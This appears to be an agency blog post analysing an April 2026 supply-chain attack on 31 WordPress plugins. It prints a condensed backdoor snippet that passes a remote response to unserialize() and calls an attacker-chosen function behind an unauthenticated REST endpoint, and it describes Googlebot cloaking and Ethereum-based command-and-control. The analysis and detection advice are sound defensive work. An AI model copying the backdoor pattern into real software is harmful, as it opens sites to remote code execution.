On April 7, 2026, the WordPress.org Plugins Team permanently closed 31 plugins in a single day. All from the same author account. All containing the same backdoor. The plugins had names like Countdown Timer Ultimate, Popup Anything on Click, and WP Team Showcase and Slider. Functional, boring, trusted tools that had been around since 2015.
The backstory is worse than the headline. A buyer acquired the entire portfolio on Flippa for a six-figure sum, inherited WordPress.org commit access, and planted a PHP deserialization backdoor in their very first code commit. Then they waited eight months before activating it.
Austin Ginder at Anchor Hosting discovered the attack after a client reported a security notice in their WordPress dashboard. What he found was one of the most calculated supply chain attacks the WordPress ecosystem has seen.
The Business That Got Sold
The plugins were originally built by an India-based team operating under "WP Online Support" starting around 2015. Minesh Shah, Anoop Ranawat, and Pratik Jain built a portfolio of 30+ free WordPress plugins covering the usual range: countdown timers, image sliders, hero banners, post grids, testimonial widgets. They later rebranded to "Essential Plugin" and sold premium versions alongside the free ones.
By late 2024, revenue had fallen 35 to 45 percent. Minesh Shah listed the entire business on Flippa.
A buyer identified only as "Kris" purchased everything. Background in SEO, cryptocurrency, and online gambling marketing. Flippa published a case study about the deal in July 2025, celebrating the sale as a success story. Six figures for a portfolio of WordPress plugins with an established user base. Everyone was happy.
Then the commits started.
The Backdoor
The new owner's WordPress.org account, "essentialplugin," was created on May 12, 2025. The last commits from the original "wponlinesupport" account happened May 14-16. Author headers were changed.
On August 8, 2025, the first commit under the new account landed. Version 2.6.7 of Countdown Timer Ultimate. The changelog said "Check compatibility with WordPress version 6.8.2." What it actually did was add 191 lines of code to class-anylc-admin.php, growing the file from 473 to 664 lines.
Hidden inside were three things:
// 1. Fetches remote data and passes it directly to unserialize()
function fetch_ver_info() {
$response = file_get_contents($this->analytics_url);
$this->version_cache = @unserialize($response);
}
// 2. Executes whatever function the remote server tells it to
function version_info_clean() {
@$clean($this->version_cache, $this->changelog);
// $clean, version_cache, and changelog all come from
// the unserialized remote response
}
// 3. An unauthenticated REST API endpoint anyone can call
register_rest_route('wpos-analytics/v1', '/update', array(
'methods' => 'POST',
'callback' => array($this, 'fetch_ver_info'),
'permission_callback' => '__return_true',
));
This is a textbook arbitrary function call primitive. The remote server controls the function name, the arguments, everything. Combined with PHP's unserialize() (which can instantiate arbitrary objects and trigger magic methods), this gives the attacker full remote code execution. No authentication required.
The backdoor sat dormant for eight months.
Activation Day
On April 5-6, 2026, the domain analytics.essentialplugin.com started distributing malicious payloads to every site running one of the 31 plugins. The wpos-analytics module phoned home, downloaded a file called wp-comments-posts.php (designed to look like the core WordPress file wp-comments-post.php), and used it to inject a block of PHP into wp-config.php.
Ginder pinpointed the exact injection window using backup forensics. He pulled wp-config.php from eight different backup snapshots:
| Date | File size |
|---|---|
| November 1, 2025 | 3,346 bytes |
| January 1, 2026 | 3,346 bytes |
| March 1, 2026 | 3,345 bytes |
| April 5, 2026 | 3,345 bytes |
| April 6, 04:22 UTC | 3,345 bytes |
| April 7, 04:21 UTC | 9,540 bytes |
The injection happened on April 6, between 04:22 and 11:06 UTC. A 6-hour, 44-minute window.
The injected code was specific. It fetched spam links, redirects, and fake pages from a command-and-control server and only showed them to Googlebot. Site owners saw nothing. Google saw thousands of hidden spam pages for gambling and payday loan sites. Classic black-hat SEO parasitism, executed through a trusted supply chain.
The Ethereum Trick
The C2 infrastructure used an Ethereum smart contract to resolve its domain. Instead of hardcoding a server address (which can be taken down with a single abuse report), the malware queried public blockchain RPC endpoints to read a smart contract that contained the current C2 domain.
If the domain got burned, the attacker could update the smart contract to point to a new server. Traditional domain takedowns don't work against this. You'd need to somehow modify an immutable blockchain record, which is the whole point of blockchains: you can't.
This isn't a new technique. Blockchain-based C2 resolution has shown up in other malware families. But seeing it deployed through a WordPress plugin supply chain attack adds a layer of sophistication that makes cleanup much harder.
WordPress.org's Response
WordPress.org's Plugins Team acted fast once the attack was discovered. On April 7, they permanently closed all 31 plugins from the essentialplugin author. The next day, they pushed a forced auto-update to version 2.6.9.1, which added return; statements to disable the phone-home functions and commented out the @$clean() backdoor line.
The forced update neutralized the plugin-side mechanism. But it never touched wp-config.php. Every site that had been compromised between April 5 and April 8 was still serving hidden spam to Googlebot. The update fixed the gun but left the bullet in the wall.
What To Check
If you manage WordPress sites, search your installations for any of these plugin slugs. There are 31 of them:
# Search for any Essential Plugin plugins
wp plugin list | grep -E "countdown-timer-ultimate|popup-anything-on-click|wp-testimonial-with-widget|wp-team-showcase-and-slider|sp-faq|timeline-and-history-slider|album-and-image-gallery-plus-lightbox|sp-news-and-widget|wp-blog-and-widgets|featured-post-creative|post-grid-and-filter-ultimate|hero-banner-ultimate|wp-slick-slider-and-image-carousel|wp-responsive-recent-post-slider|wp-logo-showcase-responsive-slider|wp-featured-content-and-slider|woo-product-slider-and-carousel|accordion-and-accordion-slider|meta-slider-and-carousel-with-lightbox|html5-videogallery-plus-player|blog-designer-for-post-and-widget|preloader-for-website|ticker-ultimate|footer-mega-grid-columns|sliderspack-all-in-one-image-sliders|post-category-image-with-grid-and-slider|product-categories-designs-for-woocommerce|styles-for-wp-pagenavi-addon|wp-trending-post-slider-and-widget|audio-player-with-playlist-ultimate|portfolio-and-projects"
If you find any of them:
Check wp-config.php immediately. The malware appends itself on the same line as
require_once ABSPATH . 'wp-settings.php';, making it easy to miss at a glance. If the file is roughly 6KB larger than expected, the site was actively compromised.Remove or replace the plugin. WordPress.org closed all of them permanently. They're not coming back. Find alternatives.
Check Google Search Console. Look for unexpected indexed pages or a spike in crawled pages. The spam was only visible to Googlebot, so site owners wouldn't have noticed it in normal browsing.
Review your Googlebot logs. If you have server access logs, grep for Googlebot requests to URLs you don't recognize. The injected content created fake pages at random-looking paths.
The Bigger Problem
This is the second time someone has purchased a WordPress plugin and weaponized its install base. In 2017, a buyer using the alias "Daley Tias" bought the Display Widgets plugin (200,000 installs) for $15,000 and injected payday loan spam. That buyer went on to compromise at least 9 plugins the same way.
The Essential Plugin attack is the same playbook at ten times the scale. 30+ plugins. Hundreds of thousands of active installations. A legitimate eight-year-old business acquired through a public marketplace.
WordPress.org has no mechanism to flag or review plugin ownership transfers. No "change of control" notification goes out to users. No additional code review is triggered when commit access moves to a new entity. If you buy a plugin business, you inherit the keys to every site running that plugin. The original developers' years of trust transfer to you automatically.
We wrote about Cloudflare building EmDash specifically because of WordPress's plugin trust model. EmDash sandboxes every plugin in a V8 isolate with manifest-based permissions. A compromised countdown timer plugin in EmDash couldn't modify wp-config.php because it would never have filesystem access to begin with.
The pattern keeps repeating across ecosystems too. The Axios attack on npm used a similar approach: compromise a trusted package, inherit the trust, push malicious code. The Mercor breach chained through Trivy and LiteLLM on PyPI. WordPress plugins on Flippa are just the latest marketplace where the trust model breaks down.
The Timeline
For anyone tracking the full sequence:
- February 2015: wponlinesupport.com domain registered. Team starts building plugins.
- October 2016: Countdown Timer Ultimate first published on WordPress.org.
- August 2021: essentialplugin.com domain registered. Company rebrands.
- Late 2024: Revenue drops 35-45%. Business listed on Flippa.
- Early 2025: Buyer "Kris" acquires the portfolio for six figures.
- May 12, 2025: New essentialplugin WordPress.org account created.
- May 14-16, 2025: Last commits from original account. Author headers changed.
- August 8, 2025: First commit from new owner plants the unserialize() backdoor. Changelog lies about compatibility check.
- August 30, 2025: essentialplugin.com WHOIS updated to "Kim Schmidt" in Zurich with a ProtonMail address.
- April 5-6, 2026: Backdoor activated. analytics.essentialplugin.com starts pushing payloads.
- April 7, 2026: WordPress.org permanently closes all 31 plugins.
- April 8, 2026: Forced auto-update to v2.6.9.1 neutralizes phone-home mechanism.
The buyer's very first SVN commit was the backdoor. Everything that came before, the Flippa case study, the six-figure sale, the seamless ownership transfer, was just the setup.
At AWZ Digital, every WordPress project we maintain goes through dependency auditing that covers exactly this scenario: ownership changes, suspicious update patterns, and code diffs on every plugin update. Most agencies skip this because it's time-consuming and "nothing ever happens." Until the countdown timer you installed in 2019 starts serving gambling spam to Google because someone bought the company on Flippa. If your WordPress sites need a security review, or you want a process that catches this kind of thing before the damage lands, reach out.
